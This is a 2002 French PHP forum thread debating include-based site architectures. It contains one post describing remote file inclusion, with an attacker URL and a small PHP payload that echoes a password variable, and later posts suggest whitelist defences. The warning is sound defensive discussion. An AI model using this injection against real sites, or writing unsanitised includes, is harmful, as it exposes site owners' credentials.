Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
2256 connectés 

  FORUM HardWare.fr
  Programmation

  [php] methode de programmation d un site web

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

[php] methode de programmation d un site web

n°173271
slvn
Posté le 09-07-2002 à 03:03:57  profilanswer
 

je voulais savoir quel est la meilleur methode pour creer un "gros" site en php :
 
1/ fait un index.php    qui include suivant un parametre la page du "milieu" correspondante au parametre
 
ou
 
2/faire une page haut.php, bas.php    et que toute les pages utilisent  include haut.php,     et include bas.php  
 
 
vos choix ????
(perso j ai choisi la methode 2....)

mood
Publicité
Posté le 09-07-2002 à 03:03:57  profilanswer
 

n°173273
Je@nb
Kindly give dime
Posté le 09-07-2002 à 03:14:19  profilanswer
 

2èmes solution

n°173335
antp
Super Administrateur
Champion des excuses bidons
Posté le 09-07-2002 à 09:44:08  profilanswer
 

perso je préfère la 1è, plus facile si tu veux changer les emplacements des fichiers je trouve, vu que seul index.php est connu de l'exérieur :)
c'est la 1è méthode que j'ai utilisé sur mon site (mais les paramètres sont un peu trop long, faut que j'arrange ça, j'ai fait ça y a un an, je débutais en php)


---------------
mes programmes ·· les voitures dans les films ·· apprenez à écrire
n°173501
slvn
Posté le 09-07-2002 à 12:04:04  profilanswer
 

yep c est le pb de la 1 ere methode...
 
up :o)
 
 

n°173641
Je@nb
Kindly give dime
Posté le 09-07-2002 à 14:28:04  profilanswer
 

Regarde hardware.fr, ppc, fait la 2, moi je fais aussi comme ça, au moins ta pas une tonne de variable, ça t'évite des switch, de devoir faire des vérifs et tout. Tu te paies pas des longues url etc.

n°173993
slvn
Posté le 09-07-2002 à 22:57:35  profilanswer
 

ouais je crois que c clair tout les sites sont basés sur ce principe

n°173998
Stligar
Posté le 09-07-2002 à 23:08:42  profilanswer
 

Les pseudos frames ont aussi leur charmes (pas de recharge complete de la page), moi je prefere :)
 
Le site parait bcp plus rapide
 
Genre eurisko.fr
 


---------------
Vente privee - Dieu t'a donné deux oreilles et une bouche afin que tu écoutes deux fois plus que tu ne parles.
n°174022
Je@nb
Kindly give dime
Posté le 10-07-2002 à 00:16:34  profilanswer
 

eurisko c différent vu que le panier est dans l'url codée en base64 etc.

n°174026
Stligar
Posté le 10-07-2002 à 00:49:22  profilanswer
 

Et ? pas besoin de pseudo frame pour coder l'url

n°174028
Je@nb
Kindly give dime
Posté le 10-07-2002 à 00:52:00  profilanswer
 

ce que je veux dire c que leur url sont + compliquées

mood
Publicité
Posté le 10-07-2002 à 00:52:00  profilanswer
 

n°174029
Sh@rdar
Ex-PhPéteur
Posté le 10-07-2002 à 00:52:45  profilanswer
 

moi j'utilise la 1
 
- pas d'erreur 404, tu tapes toujours sur l'index, si la page existe pas tu y restes et c'est tout
- référence des images et du reste, toujours par rapport à la racine du site, donc plus simple pour la gestion des répertoires
- ça permet de mieux ranger ses pages, même avec des noms tordus, donc maintenance plus facile
 
 
pour les pseudos frames, on recharge toute la page, pas seulement le morceau changé (sauf image en cache forcément)
 
pour eurisko, le caddie est dans une session, encodée avec les param url en base64


---------------
La musique c'est comme la bouffe, tu te souviens du restaurant dans lequel t'as bien mangé 20 ans plus tôt, mais pas du sandwich d'il y a 5 minutes :o - Plugin pour winamp ©Harkonnen : http://harko.free.fr/soft
n°174031
Je@nb
Kindly give dime
Posté le 10-07-2002 à 00:55:19  profilanswer
 

404 : tu peux faire un htaccess pour rediriger
référence des images, css et tout : <img src="/reference_a_la_racine.jpg" alt=""/>
 
on peut toujours faire une arbo propre avec cette méthode

n°174033
Sh@rdar
Ex-PhPéteur
Posté le 10-07-2002 à 00:59:52  profilanswer
 

pour les pages ok mais pour un site moyen / gros
 
en général, tu répartis les images en répertoire (menus, boutons etc..)et si tu fais un arbre avec tes pages, bonjour pour vérifier à quel niveau tu te trouves pour afficher l'image (ou alors faut utiliser des chemins absolus mais moi perso j'aime pas)


---------------
La musique c'est comme la bouffe, tu te souviens du restaurant dans lequel t'as bien mangé 20 ans plus tôt, mais pas du sandwich d'il y a 5 minutes :o - Plugin pour winamp ©Harkonnen : http://harko.free.fr/soft
n°174034
Je@nb
Kindly give dime
Posté le 10-07-2002 à 01:06:50  profilanswer
 

Sh@rdar a écrit a écrit :

pour les pages ok mais pour un site moyen / gros
 
en général, tu répartis les images en répertoire (menus, boutons etc..)et si tu fais un arbre avec tes pages, bonjour pour vérifier à quel niveau tu te trouves pour afficher l'image (ou alors faut utiliser des chemins absolus mais moi perso j'aime pas)




 
Ben non seulement en mettant / ça te ramène à la racine de ton virtualhost et tu peux i accéder comme si ta page était à la racine.

n°174095
Stligar
Posté le 10-07-2002 à 09:21:25  profilanswer
 

En tout cas moi je trouve que la methode 1 (dc les pseudo frames sont plus sympa ) :)
Et en tre nous que l'url soit longue ou pas ça change pas grand chose

n°174126
z0rglub
Posté le 10-07-2002 à 10:00:54  profilanswer
 

pour un de mes sites, je fais la méthode 1, ça a l'avantage d'être simple je trouve. Par contre, ATTENTION, ça peut poser un gros pb de sécurité si on est pas au courant : si votre URL est http://www.monsite.com/index.php?page=truc et que vous faites un simple include( "truc.php" );, imaginez le mec qui fait ...?page=http://www.autresite.com/hack.php
bien sûr le PHP est désactivé sur le serveur de autresite.com et ce hack.php contient :

Code :
  1. <?php
  2.      echo $password;
  3. ?>


et bien, si vous avez une variable $password, (celui fourni par votre hébergeur par exemple) et bien ça fait très mal.
Un mec sympa m'a envoyé par mail toutes mes infos de connexions chez mon hébergeur et m'a prévenu du danger... donc, faites attention.


Message édité par z0rglub le 10-07-2002 à 10:01:46

---------------
Ma galerie photo créée avec Piwigo et hébergée sur Piwigo.com
n°174128
antp
Super Administrateur
Champion des excuses bidons
Posté le 10-07-2002 à 10:05:18  profilanswer
 

pour le include je fais avant un test de l'existance du fichier (file_exists ou un truc du genre)
si le fichier est sur un autre serveur ça le bloquera j'imagine ?
 
de toute façon je vais bientôt utiliser un tableau associatif, pour n'avoir dans l'url que deux lettre me permettant de trouver la page qui y correspond, ça évitera tout risque de piratage de ce genre j'imagine.


---------------
mes programmes ·· les voitures dans les films ·· apprenez à écrire
n°174130
z0rglub
Posté le 10-07-2002 à 10:07:39  profilanswer
 

antp a écrit a écrit :

pour le include je fais avant un test de l'existance du fichier (file_exists ou un truc du genre)
si le fichier est sur un autre serveur ça le bloquera j'imagine ?
 
de toute façon je vais bientôt utiliser un tableau associatif, pour n'avoir dans l'url que deux lettre me permettant de trouver la page qui y correspond, ça évitera tout risque de piratage de ce genre j'imagine.




personnellement, depuis qu'on m'a dit comment me hacker, je fais un tableau associatif et je contrôle la présence dans le table ( if (  in_array( $HTTP_GET_VARS['page'], $sitepages ) )


---------------
Ma galerie photo créée avec Piwigo et hébergée sur Piwigo.com
n°174269
slvn
Posté le 10-07-2002 à 12:50:07  profilanswer
 

pour la 2,
j'arrive a gérér utra simplement 7 catégories d'USER,  ( ie menu perso, + securisation des pages:) ), + chartre graphique commune ...


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation

  [php] methode de programmation d un site web

 

Sujets relatifs
Création d'un site web avec tableauxsite
Procédure pour mettre en ligne un site web avec apache?Je voudrais m'initier à la programmation, je commence par koi??
Statistiques sur site web, Xiti...Quel script PHP utiliser pour faire des logs/stats sur son site ?
Cherche site pour besoins spécifiques bloquer le bouton droit uniquement sur une image du site
Coût d'un site web ?Mon site: ou me suis-je trompé ?
Plus de sujets relatifs à : [php] methode de programmation d un site web


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR